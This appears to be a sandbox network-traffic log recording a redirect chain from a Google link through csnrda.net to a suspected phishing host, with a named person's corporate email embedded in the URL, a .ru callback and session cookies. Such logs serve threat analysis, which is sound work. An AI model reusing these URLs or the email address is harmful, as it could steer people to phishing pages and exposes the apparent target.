              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /un-plugins/ HTTP/1.1Host: csnrda.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.google.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NjgSso0i/*kirstie.rees@quiltercheviot.com HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://csnrda.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=MsR3ix3ZTuGO.oxpGGmKOjH5bEH4pMvIU79KP37DwZg-1743001909-1.0.1.1-0GgfN2b2Oq_xsvT7IBcqmpPlx9teGDDM.JAZGhCcj34CHBM3h8UiRXKXtY7ZqCfVm7swhrZb9.TnAyhnHPGLiwaNKDTLrzYTCjehQxgQrj8
              Source: global trafficHTTP traffic detected: GET /machlo$a0iuc8 HTTP/1.1Host: 7j87.nmpjkg.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://y0x6.tjsqawfetli.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /machlo$a0iuc8 HTTP/1.1Host: 7j87.nmpjkg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /NjgSso0i/*kirstie.rees@quiltercheviot.com HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVKOWVqWTNyUHRLOUdoVjcwaG9oRUE9PSIsInZhbHVlIjoiMkN5cnh0Z3pnMUx4UHFxbW1UU2pUUnJ3bDZveXpPcWRJWG5qN0p3VStaeEVIVkVZVk9oN2tCMy9MaGlFeFpQTGJhenpudmN3a1M3bEpFdHZseFJGRHdpc1U0UWJVT1RFcE9CL01jY2xUc0ovNzZrUEcvMkQyUDlPczM2eFp0RXEiLCJtYWMiOiJmNzRhYTBiYTZhNzUwNjQwMmNlMTg3MjNiYzE3ZGEyMGI2N2Y3MjUzMDcyYjQ2ZDUxMzg0NDdjNTgwMGVjOTlkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJGNlBRdkFwcG55WjlLcW9oZFNMV2c9PSIsInZhbHVlIjoiL2tCWTV4TVM4cjNtNjM5TlU5MllFM2Y1VzdsOSsrTXJSaXhiQldvMUpVdUs3by9SZGlzMVJDemVkZHVGSWRrZU9hdE1ES1JHd3A3dFVvNVBoMTRwL3IrQVl0ZG5pbENQSGE4M2NWWFh0MUpYazF6N01WNitXS3JLRFp3eEZZSS8iLCJtYWMiOiJjMWQ2YWY4ZmU5NjEzZWFmNDM3OTYzNzY2OTA4ZjM5ZWQwMDE2YWZmYmUwM2U1MDcyOGU3MjYzNmI5MGFkNTViIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mx5ja6d20FTRDDd2WxrmtuhjDo5d HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVKOWVqWTNyUHRLOUdoVjcwaG9oRUE9PSIsInZhbHVlIjoiMkN5cnh0Z3pnMUx4UHFxbW1UU2pUUnJ3bDZveXpPcWRJWG5qN0p3VStaeEVIVkVZVk9oN2tCMy9MaGlFeFpQTGJhenpudmN3a1M3bEpFdHZseFJGRHdpc1U0UWJVT1RFcE9CL01jY2xUc0ovNzZrUEcvMkQyUDlPczM2eFp0RXEiLCJtYWMiOiJmNzRhYTBiYTZhNzUwNjQwMmNlMTg3MjNiYzE3ZGEyMGI2N2Y3MjUzMDcyYjQ2ZDUxMzg0NDdjNTgwMGVjOTlkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJGNlBRdkFwcG55WjlLcW9oZFNMV2c9PSIsInZhbHVlIjoiL2tCWTV4TVM4cjNtNjM5TlU5MllFM2Y1VzdsOSsrTXJSaXhiQldvMUpVdUs3by9SZGlzMVJDemVkZHVGSWRrZU9hdE1ES1JHd3A3dFVvNVBoMTRwL3IrQVl0ZG5pbENQSGE4M2NWWFh0MUpYazF6N01WNitXS3JLRFp3eEZZSS8iLCJtYWMiOiJjMWQ2YWY4ZmU5NjEzZWFmNDM3OTYzNzY2OTA4ZjM5ZWQwMDE2YWZmYmUwM2U1MDcyOGU3MjYzNmI5MGFkNTViIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjhmT1lkYkJDTTArUEdab2tCNStTNHc9PSIsInZhbHVlIjoicml3enJsalVNWWp5R2hpZ0dDa2FNckZleW5xdDlVU1BYbWZhQTREUkRpNjVNNWozSkFCZkJ6YmdzVlk2RDdPaks0VjMvdzRTclAxNlcycTZaUjBZNkNnUjFzbDhhblBGQkdUK3lGcTY3WHVHRDBUamhkbGFnTlVtWjhuc29tV1AiLCJtYWMiOiI0YjIwOTA4ODJiM2U3YjZlNjAyMTQxZjgxZDc3M2JhNmFjN2UwMTdlMzQ0MTZlYTg4YTRhNzU3MTY5M2ZiNmU2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii84b2JPd1JkMW9uQ2hKNFhrMS9GdXc9PSIsInZhbHVlIjoiVWdkUzdGOEZEclEydmpQdUlZZjdsZktnMWN3cjQreTRPVjRWemMyYURZUmdLNEZqektGMnl4RVdha0RwMzduNWU3QzlleHBHTndFSWpoeDhadUlyWWR5UFRNUUpaUmswTHlkUmRWS1o1a01DU2ZGOWltVFE3cjJjcjB2akVselgiLCJtYWMiOiI5YzA2OTExMGYxYTIyODI4ZGUxYzlkZjgwZjZlMzAxNmMzYWNjODNiN2U3YTZlOWFjZTA5MjI4NDFiMTUxYjZmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /zcE2QLrz0cz39kxUr8OYVGulcrWHmTKZ5rZwfw HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik9sV1BmQmZiSFBvdGZUMWM1MG54ZHc9PSIsInZhbHVlIjoiMXQ4WVNLdkhmQVdkdkFyUW1KZWFzT093VGxYV2VOdk1RWEpMMVpnTCtYdnlXZjkxdXJhaXViMTBlbDRWRW83VFhZRjMvWndZNHRLd1JQaHNnZmI2K2YxS3FzeC9Xa1cwSG1FTEwvZUt4QzVwZ2ZtNWJ3R3lzTGRBeVA1TFNXOEYiLCJtYWMiOiJhZWNiOTQ1Mzc1ZTVmYjI0ODFmNTExZDVhMjBmMWY5NTZmN2Y4YmI4NTNhNzYwNWU4OWQ4YzJmYTg4NmVmNGQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpoclNjMXZqc3htVTdUa1pnbWhpR1E9PSIsInZhbHVlIjoiQVZXS09vdkZkZkZLR1dBSmlGK0t6OVEvME1VZk1zRFhCdmZpRFpmcUgrSkNMRjREWXJNaEhIWUVLNEw4R3ZaRjhFRUxuczZ0dndrSEgxNVNPUjkxYVpoU1YrTi90Z3VSNjFsN2pGOTlab2hucFQ2Y05LU2l6cnFLcVBaQnZwQngiLCJtYWMiOiJkMDcwNjI1NzkzMzIwNGZkNTAyMzA4OWQ0YWU5MGFlMjNiOTk1Njc1ZDhiN2ZkZTViN2RjOTBiNjg2MzgzZWY5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSL HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik9sV1BmQmZiSFBvdGZUMWM1MG54ZHc9PSIsInZhbHVlIjoiMXQ4WVNLdkhmQVdkdkFyUW1KZWFzT093VGxYV2VOdk1RWEpMMVpnTCtYdnlXZjkxdXJhaXViMTBlbDRWRW83VFhZRjMvWndZNHRLd1JQaHNnZmI2K2YxS3FzeC9Xa1cwSG1FTEwvZUt4QzVwZ2ZtNWJ3R3lzTGRBeVA1TFNXOEYiLCJtYWMiOiJhZWNiOTQ1Mzc1ZTVmYjI0ODFmNTExZDVhMjBmMWY5NTZmN2Y4YmI4NTNhNzYwNWU4OWQ4YzJmYTg4NmVmNGQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpoclNjMXZqc3htVTdUa1pnbWhpR1E9PSIsInZhbHVlIjoiQVZXS09vdkZkZkZLR1dBSmlGK0t6OVEvME1VZk1zRFhCdmZpRFpmcUgrSkNMRjREWXJNaEhIWUVLNEw4R3ZaRjhFRUxuczZ0dndrSEgxNVNPUjkxYVpoU1YrTi90Z3VSNjFsN2pGOTlab2hucFQ2Y05LU2l6cnFLcVBaQnZwQngiLCJtYWMiOiJkMDcwNjI1NzkzMzIwNGZkNTAyMzA4OWQ0YWU5MGFlMjNiOTk1Njc1ZDhiN2ZkZTViN2RjOTBiNjg2MzgzZWY5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /346fndDfLt88Ww23abbZTGRt6720 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /abv5IA8EJpq3Qcgh23 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveOrigin: https://y0x6.tjsqawfetli.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveOrigin: https://y0x6.tjsqawfetli.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
